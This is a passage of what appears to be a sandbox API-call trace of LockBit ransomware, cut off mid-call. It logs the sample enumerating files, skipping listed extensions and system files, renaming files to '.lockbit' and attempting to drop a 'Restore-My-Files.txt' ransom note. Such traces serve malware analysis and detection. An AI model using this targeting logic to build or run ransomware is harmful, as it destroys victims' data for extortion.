[0162.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01152_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.511] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.511] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.511] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8752) returned 1 [0162.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.512] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.517] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.517] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.518] free (_Block=0x1fa2ed8) [0162.518] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.518] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.518] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.518] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6425c00, ftCreationTime.dwHighDateTime=0x1bd4afc, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6425c00, ftLastWriteTime.dwHighDateTime=0x1bd4afc, nFileSizeHigh=0x0, nFileSizeLow=0x15b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01154_.WMF", cAlternateFileName="")) returned 1 [0162.518] lstrcmpiW (lpString1=".", lpString2="NA01154_.WMF") returned -1 [0162.518] lstrcmpiW (lpString1="..", lpString2="NA01154_.WMF") returned -1 [0162.518] PathFindExtensionW (pszPath="NA01154_.WMF") returned=".WMF" [0162.518] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.519] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.520] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.520] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01154_.WMF") returned 1 [0162.521] lstrcmpiW (lpString1="ntldr", lpString2="NA01154_.WMF") returned 1 [0162.521] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01154_.WMF") returned 1 [0162.521] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01154_.WMF") returned -1 [0162.521] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01154_.WMF") returned -1 [0162.521] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01154_.WMF") returned 1 [0162.521] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01154_.WMF") returned -1 [0162.521] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.521] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF") returned=".WMF" [0162.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.521] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.521] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.522] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.522] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF.lockbit") returned 72 [0162.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01154_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.523] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.523] malloc (_Size=0x40068) returned 0x3d70450 [0162.523] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5552) returned 1 [0162.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.525] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.529] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.529] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.529] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.530] free (_Block=0x1fa2ed8) [0162.530] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.531] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.531] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1858, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01157_.WMF", cAlternateFileName="")) returned 1 [0162.531] lstrcmpiW (lpString1=".", lpString2="NA01157_.WMF") returned -1 [0162.531] lstrcmpiW (lpString1="..", lpString2="NA01157_.WMF") returned -1 [0162.531] PathFindExtensionW (pszPath="NA01157_.WMF") returned=".WMF" [0162.531] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.531] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.532] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.532] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01157_.WMF") returned 1 [0162.533] lstrcmpiW (lpString1="ntldr", lpString2="NA01157_.WMF") returned 1 [0162.533] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01157_.WMF") returned 1 [0162.533] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01157_.WMF") returned -1 [0162.533] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01157_.WMF") returned -1 [0162.533] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01157_.WMF") returned 1 [0162.533] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01157_.WMF") returned -1 [0162.533] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.533] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF") returned=".WMF" [0162.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.533] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.533] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.534] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.535] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF.lockbit") returned 72 [0162.535] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01157_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.536] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.536] malloc (_Size=0x40068) returned 0x3f70048 [0162.536] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6232) returned 1 [0162.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.537] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.537] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.542] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.542] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.544] free (_Block=0x1fa2ed8) [0162.544] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.544] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.544] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.544] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf04c7b00, ftCreationTime.dwHighDateTime=0x1bd4afc, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf04c7b00, ftLastWriteTime.dwHighDateTime=0x1bd4afc, nFileSizeHigh=0x0, nFileSizeLow=0x1c74, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01158_.WMF", cAlternateFileName="")) returned 1 [0162.544] lstrcmpiW (lpString1=".", lpString2="NA01158_.WMF") returned -1 [0162.544] lstrcmpiW (lpString1="..", lpString2="NA01158_.WMF") returned -1 [0162.544] PathFindExtensionW (pszPath="NA01158_.WMF") returned=".WMF" [0162.544] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.544] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.545] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.545] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.546] lstrcmpiW 